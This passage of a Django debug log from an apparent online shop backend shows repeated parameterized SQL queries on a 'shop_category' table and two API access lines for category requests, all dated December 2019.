"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:59:47,916 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:59:47,921 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:59:47,927 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:59:47,931 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:59:47,934 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 06:59:47,940 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:59:47,945 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:59:47,949 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:59:47,950 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:59:47,957 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) [20/Dec/2019 06:59:47] "GET /api/v1/categories/15 HTTP/1.0" 200 223 DEBUG 2019-12-20 06:59:47,962 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:59:47,966 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:59:47,970 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:59:47,975 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:59:47,979 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:59:47,985 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:59:47,989 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:59:47,993 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:59:47,997 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:59:48,001 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:59:48,007 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:59:48,011 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:59:48,015 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:59:48,019 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:59:48,023 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:59:48,029 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:59:48,033 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:59:48,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:59:48,044 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:59:48,048 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:59:48,052 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:59:48,057 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:59:48,061 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:59:48,065 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:59:48,070 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:59:48,074 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:59:48] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:04:38,161 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:04:38,171 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:04:38,177 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:04:38,182 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:04:38,188 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:04:38,192 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:04:38,196 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:04:38,200 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:04:38,204 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:04:38,209 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:04:38,213 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:04:38,217 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:04:38,221 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:04:38,225 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:04:38,231 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:04:38,234 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:04:38,238 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:04:38,242 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:04:38,247 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:04:38,254 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:04:38,258 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:04:38,262 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:04:38,266 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:04:38,270 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:04:38,274 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:04:38,280 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:04:38,284 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:04:38,289 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:04:38,293 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:04:38,297 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:04:38,303 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:04:38,307 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", 